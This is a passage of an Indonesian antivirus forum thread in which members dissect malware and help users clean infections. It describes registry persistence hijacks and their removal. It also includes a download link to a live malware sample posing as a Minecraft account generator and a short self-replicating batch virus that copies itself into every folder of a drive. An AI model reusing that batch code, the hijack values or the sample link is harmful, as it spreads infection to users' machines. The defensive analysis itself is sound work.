- Berusaha mengaktifkan File svchost.exe saat User membuka Command Window pada Folder (Directory) yang sedang dibuka dengan Windows Explorer (dengan cara mengetikkan %comspec% pada Address Bar Windows Explorer). Untuk tujuan ini, Virus ini mengubah Value:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Environment, ComSpec
Dari "%SystemRoot%\system32\cmd.exe" menjadi "%SystemRoot%\system32\cmd.exe, c:\windows\svchost.exe "
Tetapi lagi-lagi file svchost.exe ini tidak ada jadi, sepertinya value ini sia-sia saja bagi Virus ini.

- Berusaha mengaktifkan File serviks.exe saat Service "Windows Installer" dijalankan. Service Windows Installer ini akan aktif setiap User menjalankan file berekstensi MSI. Untuk tujuan ini, Virus mengubah:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MSIServer, ImagePath
Dari "C:\WINDOWS\system32\msiexec.exe /V" menjadi "C:\WINDOWS\serviks.exe"


Pembersihan

- Aktifkan Smad-Lock pada setiap Drive untuk mencegah infeksi ulang selama proses Scan berlangsung.
- Full Scan dengan Smadav terbaru kemudian akan muncul daftar deteksi seperti ini:

(http://i41.servimg.com/u/f41/17/11/92/75/new_p113.jpg)

Klik Clean All untuk semua virus yang terdeteksi, Repair All untuk semua Registry yang terinfeksi.

- Hapus msvbvm60.dll dan f*** Of Malingsia.txt pada setiap Drive.
- Hapus folder C:\windows\system32\Driver\Printer\LX300
- Hapus semua file: B4ND1T[Nomor Urut].htm pada C:\WINDOWS
- Ganti kembali semua file OCX di dalam C:\WINDOWS\system32 dan C:\WINDOWS\system32\dllcache (juga file OCX di folder lain jika ada) sudah diganti oleh virus ini dengan mengambilnya dari komputer lain atau download File OCX yang asli di sini (http://www.ocxme.com/) dan taruh ganti kembali file OCX yang telah diganti virus dengan file OCX yang telah didownload tadi.
File OCX yang dibuat virus berukuran 1 KB dan dapat dikenali sewaktu dibuka dengan Notepad seperti yang telah diuraikan di atas.
- Untuk file-file PHP, KEY, HTML yang telah diganti virus, saya hanya bisa menyarankan untuk mencari dan mendapatkannya kembali dari luar.
- Sembuhkan Registry yang belum bisa disembuhkan Smadav. Salin (Copy Paste) teks di bawah ini ke dalam Notepad.
Sorry but you are not allowed to view spoiler contents.
NAMA PEMILIK dan ORGANISASI PEMILIK diganti sesuai dengan yang anda inginkan.
Kemudian simpan teks ini dengan rincian:
Save as type: All Files
File name: [Nama Terserah].reg

Setelah itu, jalankan File yang Anda simpan tadi dengan melakukan klik ganda.

- Jika anda menggunakan Software Anti Virus seperti: McAfee, Norton, dan Symantec, ganti kembali value Registry Service berikut ini dengan melakukan klik ganda melalui regedit:

Untuk McAfee:
Sorry but you are not allowed to view spoiler contents.
Untuk Norton:
Sorry but you are not allowed to view spoiler contents.
Untuk Symantec:
Sorry but you are not allowed to view spoiler contents.
Mohon saran dan tambahan rekan-rekan karena ane cuma Review seadanya..  ^:)^
nice post gan !! +1 dah  :-bd

sekalian cara bantai manualnya donk, biar nubie2 kyk ane tambah paham :)
Thanks gann +1 nya..  :)
Mastahh koq ngaku nubii c.. Merendah bgt agan ini..  ;)
Iyaa gann.. Postnya ane bagi dua karena karakternya sudah melebihi izin satu kali posting (20.000 karakter).
Judul: Re: Bedah Virus Disini !
Ditulis oleh: Septian Deni pada Pebruari 23, 2012, 11:27:24 PM
Makasih gan jadi dapat ilmu sekali lagi terima kasih...................
Judul: Re: Bedah Virus Disini !
Ditulis oleh: raihansergi pada Maret 14, 2012, 08:47:30 PM
ha, thanks buat infonya gan.. bisa juga kan lewat safe mode terus scan langsung pakek AV yang ada Heuristic VBS nya biar cepet dan gampang....
Judul: Re: Bedah Virus Disini !
Ditulis oleh: fanglisinaulan pada Oktober 16, 2012, 07:24:46 AM
ada yg lebih mendalam gan
supaya ane bisa lebih mengeti sama virus
Judul: Re: Bedah Virus Disini !
Ditulis oleh: alan_naufal pada Oktober 19, 2012, 07:22:58 PM
Ada yang berani bedah virus flame
Judul: Re: Bedah Virus Disini !
Ditulis oleh: fanglisinaulan pada Oktober 21, 2012, 12:22:57 AM
Ada yang berani bedah virus flame

virus flame atau stuxnet kayanya belom ditemukan di indo gan
Judul: Re: Bedah Virus Disini !
Ditulis oleh: inem pada Oktober 25, 2012, 09:11:21 PM
sekarang kompi gw yg kena virus kaya gitu....tepatnya setelah gw download Avast 7 security nya.....tengkyu infonyaa gan.... semua virus udah dikarantina...tapi saya bingung setelah dikarantina hrs diapain lagi itu 62 virusnya....!
Judul: Re: Bedah Virus Disini !
Ditulis oleh: Ki@mhu pada Oktober 25, 2012, 09:38:51 PM
Biarin aja virus yang sudah dikarantina itu gann.. Karena ibaratnya sudah seperti dipenjarakan dimana kunci gerbang penjaranya ada di tangan angan sendiri..  ;)

Jika agan yakin 62 file ini memang benar2 virus (tidak ada false detect), silahkan delete aja.. Tetapi jika tidak yakin, sebaiknya dibiarin saja.. Mana tau ada false detect, sehingga bisa agan restore kembali..  :)
Judul: Re: Bedah Virus Disini !
Ditulis oleh: inem pada Oktober 25, 2012, 11:10:42 PM
thx infonya gan kim@mhu ... Tapi skrg chrome,Mozila smua yg ada di dekstop hilang smua.hanya ada icon nya aja. Jadi Shortcut smuanya. Sejak instal avast, virus yg dilacak oleh smadav 90% dari file avast. Apa perlu saya uninstal avast aja gan??? Saya ga takbiran cuma gara2 virus doang hahahaaha...
Judul: Re: Bedah Virus Disini !
Ditulis oleh: nurulhuda pada November 09, 2012, 03:05:56 PM
cara atas ya gmana gan
Judul: Re: Bedah Virus Disini !
Ditulis oleh: Ki@mhu pada November 09, 2012, 10:45:17 PM
thx infonya gan kim@mhu ... Tapi skrg chrome,Mozila smua yg ada di dekstop hilang smua.hanya ada icon nya aja. Jadi Shortcut smuanya. Sejak instal avast, virus yg dilacak oleh smadav 90% dari file avast. Apa perlu saya uninstal avast aja gan??? Saya ga takbiran cuma gara2 virus doang hahahaaha...
Coba lampirkan log hasil Scan Smadav komp agan di sini.. Biar dicek oleh Smadaver d sini.. :)
Judul: Re: Bedah Virus Disini !
Ditulis oleh: nurulhuda pada November 15, 2012, 10:09:14 PM
cara atasi biar tidak masuk gmana gan
Judul: Re: Bedah Virus Disini !
Ditulis oleh: C640 pada Pebruari 21, 2013, 08:15:22 PM
:(
Judul: Re: Bedah Virus Disini !
Ditulis oleh: anno79 pada Januari 02, 2014, 10:06:22 AM
Allo Semua...

Saya mau menanyakan perihal virus di USB (Flash Disk).
Jadi saya mendapat virus ini pas sedang ngeprint di rental kampus.
Baru sadar terinfeksi ketika file yang berupa Word/Excel dalam USB berubah menjadi Screen Saver (*.scr) ketika mo dipindah ke desktop/laptop.

Sudah di scanner pakai smadav 9.5.3 (terbaru), namun komputer (desktop/laptop)  dan USB dinyatakan bersih.
Hanya pas file dari USB (word/excel) dimasukan ke USB, secara otomatis (setelah beberapa detik) berubah menjadi screen.

Saya sudah coba format USB, hanya pas dicek spacenya tetap ada 4 KB (bukan 0 KB).
SUdah coba di unhidden, namun tidak ketemu juga filenya.

Saya juga sudah coba browse di google cara basminya, dan ketemu artikel dibawah ini:
http://virusindonesia.com/2006/10/20/waspada-h5n1-menyerang-komputer/

Hanya saya belum tau cara melakukannya (maklum kurang jago ngutik2).

Mohon bantuannya dari rekan2 disini untuk penangulangan virus dalam USB ini.

Terima kasih
Judul: Re: Bedah Virus Disini !
Ditulis oleh: renno pada Januari 02, 2014, 06:07:36 PM
Allo Semua...

Saya mau menanyakan perihal virus di USB (Flash Disk).
Jadi saya mendapat virus ini pas sedang ngeprint di rental kampus.
Baru sadar terinfeksi ketika file yang berupa Word/Excel dalam USB berubah menjadi Screen Saver (*.scr) ketika mo dipindah ke desktop/laptop.

Sudah di scanner pakai smadav 9.5.3 (terbaru), namun komputer (desktop/laptop)  dan USB dinyatakan bersih.
Hanya pas file dari USB (word/excel) dimasukan ke USB, secara otomatis (setelah beberapa detik) berubah menjadi screen.

Saya sudah coba format USB, hanya pas dicek spacenya tetap ada 4 KB (bukan 0 KB).
SUdah coba di unhidden, namun tidak ketemu juga filenya.

Saya juga sudah coba browse di google cara basminya, dan ketemu artikel dibawah ini:
http://virusindonesia.com/2006/10/20/waspada-h5n1-menyerang-komputer/

Hanya saya belum tau cara melakukannya (maklum kurang jago ngutik2).

Mohon bantuannya dari rekan2 disini untuk penangulangan virus dalam USB ini.

Terima kasih

Itu web PCMedia Antivirus (PCMAV), coba gunakan antivirus itu. gunakan versi 9.6 yang terbaru, bagaimana hasilnya?
Judul: Re: Bedah Virus Disini !
Ditulis oleh: deni.doank pada Januari 02, 2014, 06:57:54 PM
@anno79: sepertunya terinfeksi virus dorifel. gunakan PCMAV Express for Dorifel download di http://virusindonesia.com/download-pcmav-express/
Judul: Re: Bedah Virus Disini !
Ditulis oleh: Regnier de Graaf pada April 07, 2014, 09:35:25 AM
ane barusan iseng2 download virus buat dites di kompi ane yg ramnya bermasalah,  dr sini http://www.mediafire.com/?h523ple3mlrr4da
Namanya sih minecraft premium account generator tp fake lho, dia bikin folder acak (tersembunyi) di C:/users/(nama user yg jalanin virusnya) (klu di win 7) atau c:/Documents and Settings/(user yg jalanin virus). (klu di Windows xp)
Dan klu dibuka foldernya Explorer tutup sendiri
User edit:
Saya sendiri tidak tahu apa yg sebenarnya dilakukan virus ini tapi ini beberapa tindakan virus:
Memunculkan eror "Notepad has stopped working sesaat setelah virus dijalankan

Setelah itu drop beberapa file di folder C:/users/(username yg jalanin virus) (win7) atau c:/Documents and Settings/(username yg jalanin virus) (win xp)

Membuat file "Windowsuodate.com" jalan setiap kali user login

Untungnya virus ini tidak disable task manager dan registry editor dan tidak menginjeksi file.

Pembersihan akan saya jelaskan nanti
Judul: Re: Bedah Virus Disini !
Ditulis oleh: renno pada April 07, 2014, 03:41:11 PM
ane barusan iseng2 download virus buat dites di kompi ane yg ramnya bermasalah,  dr sini http://www.mediafire.com/?h523ple3mlrr4da
Namanya sih minecraft premium account generator tp fake lho, dia bikin folder acak (tersembunyi) di C:/users/(nama user yg jalanin virusnya) (klu di win 7) atau c:/Documents and Settings/(user yg jalanin virus). (klu di Windows xp)
Dan klu dibuka foldernya Explorer tutup sendiri
User edit:
Saya sendiri tidak tahu apa yg sebenarnya dilakukan virus ini tapi ini beberapa tindakan virus:
Memunculkan eror "Notepad has stopped working sesaat setelah virus dijalankan

Setelah itu drop beberapa file di folder C:/users/(username yg jalanin virus) (win7) atau c:/Documents and Settings/(username yg jalanin virus) (win xp)

Membuat file "Windowsuodate.com" jalan setiap kali user login

Untungnya virus ini tidak disable task manager dan registry editor dan tidak menginjeksi file.

Pembersihan akan saya jelaskan nanti

Kompas Antivirus 3.0.3 Engine Versi 100 Database Versi 343 mendeteksi Sampel dari agan

(http://s28.postimg.org/bs8lcifff/screenshot_400.png)
Judul: Re: Bedah Virus Disini !
Ditulis oleh: tombolo pada Mei 08, 2014, 11:22:10 AM
ngeri juga ya ada virus baru. itu ngehide folder aja atau sama file juga bos??
Judul: Re: Bedah Virus Disini !
Ditulis oleh: raflipetarungvirus123 pada Juni 06, 2014, 10:56:13 AM
ane pas lagi pengen  main openbve eh tiba tiba malah ada pesan begini gan'' the application was unable to start correctly (0xc000007b) click ok to close application'' tolong pencerahan nya gan  ???
Judul: Re: Bedah Virus Disini !
Ditulis oleh: Muhammad Farhan pada Juni 28, 2014, 08:49:54 AM
Pagi gan, newbie nih.:D
saya mau konsultasi. saya punya virus New Heur.FFD(Link) dan New Heur Hidden Root. setiapa saya nyolokin flashdisk, mmc, selalu muncul dan di dalam flashdisk ada tulisan "shorcut 4GB". solusi nya gimana ya gan?
Judul: Re: Bedah Virus Disini !
Ditulis oleh: renno pada Juni 28, 2014, 05:25:52 PM
Pagi gan, newbie nih.:D
saya mau konsultasi. saya punya virus New Heur.FFD(Link) dan New Heur Hidden Root. setiapa saya nyolokin flashdisk, mmc, selalu muncul dan di dalam flashdisk ada tulisan "shorcut 4GB". solusi nya gimana ya gan?

Itu Virus gamarue, bisa dibersihkan dengan PCMAV 9.9.3 update build5. Jika tidak terdeteksi, bisa gunakan KompasAV 3.0.5 lalu update online.

http://virusindonesia.com/2013/08/27/gamarue-cara-unik-menyembunyikan-file-di-flashdisk/
Judul: Re: Bedah Virus Disini !
Ditulis oleh: melody pada September 08, 2014, 02:51:28 PM
oh kaya gitu yah ... hihi baru nyadar dan baru tahu... ohiya kak, kalo itu muncul lagi dan lagi karena apa yah?? smadav aku nya kurang update kali yah??
Judul: Re: Bedah Virus Disini !
Ditulis oleh: 3ndiixz pada September 10, 2014, 10:53:35 PM
virus bat yg mengkopikan diri ke semua folder
Kutip
set h=For

%h% /R "D:\" /D %%a in (*) do copy %0 "%%~fa\%%~nxa.bat"
Judul: Re: Bedah Virus Disini !
Ditulis oleh: matlexaw pada September 22, 2014, 10:15:04 AM
moga ane ga kena virus gituan
Judul: Re: Bedah Virus Disini !
Ditulis oleh: Piscine pada Oktober 01, 2014, 04:24:13 PM
virus apa aja sih yang ga kedetek sama smadav?
Judul: Re: Bedah Virus Disini !
Ditulis oleh: klikdisumber pada Januari 22, 2015, 01:44:13 PM
Gan mau tanya dong,komputer ane mati total setelah di install ulang,apa itu karena virus y?,skrng engga ane perbaikin krn uda tua juga laptoponya ^_^
Judul: Re: Bedah Virus Disini !
Ditulis oleh: Manggolo pada Januari 22, 2015, 05:09:02 PM
Gan mau tanya dong,komputer ane mati total setelah di install ulang,apa itu karena virus y?,skrng engga ane perbaikin krn uda tua juga laptoponya ^_^
mati total , kerusakan harware .
dicoba lepas batre dan carger . tekan tombol power +- 20 detik .
lepas ram dan coba hidupkan kembali dengan carger saja
Judul: Re: Bedah Virus Disini !
Ditulis oleh: dewakontesseo pada Pebruari 12, 2016, 06:15:48 PM
Agan-agan, saya mau tanya ni, Laptop saya sering loadingnya lama dan kursornya itu berputar-putar yang akibatnya tidak bisa lagi dioperasikan, setiap kambuh penyakitnya itu memakan waktu 1 jam. Pertanyaanya : Apa ya penyebabnya itu dan bagaimana cara mengatasinya? Terima Kasih.




visit my blog: http://dewakontesseo.web.id/ dan http://www.sumateraseo.web.id/
Judul: Virus Rootkit Baru Menghalangi User Masuk ke Recovery Environment.
Ditulis oleh: Ki@mhu pada Juli 21, 2017, 10:52:23 PM
Baru ketemu jenis Rookit baru yang menghalangi User masuk ke Recovery Environment lewat Shift+Restart. Sesuatu banget.. ^-^
Judul: Re:Bedah Virus Disini !
Ditulis oleh: Ki@mhu pada Juli 22, 2017, 11:34:24 PM
Sebagai tambahan, Rootkit ini juga bisa mengagalkan Boot-Time Scan-nya Avast dan menggagalkan beberapa Tool Anti-Rootkit lainnya.
Judul: Re:Bedah Virus Disini !
Ditulis oleh: Ki@mhu pada Desember 07, 2017, 11:16:43 PM
Ayo Smadaver dan para pengunjung, Silahkan buat ID dan Upload sampel virus di sini untuk dianalisis dan dikabari hasilnya.. ;)
Judul: Re:Bedah Virus Disini !
Ditulis oleh: Ki@mhu pada Desember 20, 2017, 07:37:02 PM
Sedang maraknya Adware Rootkit bernama Windows Process Manager

(https://d2wqgvap25i10a.cloudfront.net/monthly_2017_12/5a322401e90e9_WindowsProcessManager.thumb.png.3141f3e8863b899fea850851e663d99a.png)

(https://puu.sh/yahkC/fe1da6fcdd.png)

(https://malwaretips.com/attachments/screenshot-26-png.177284/)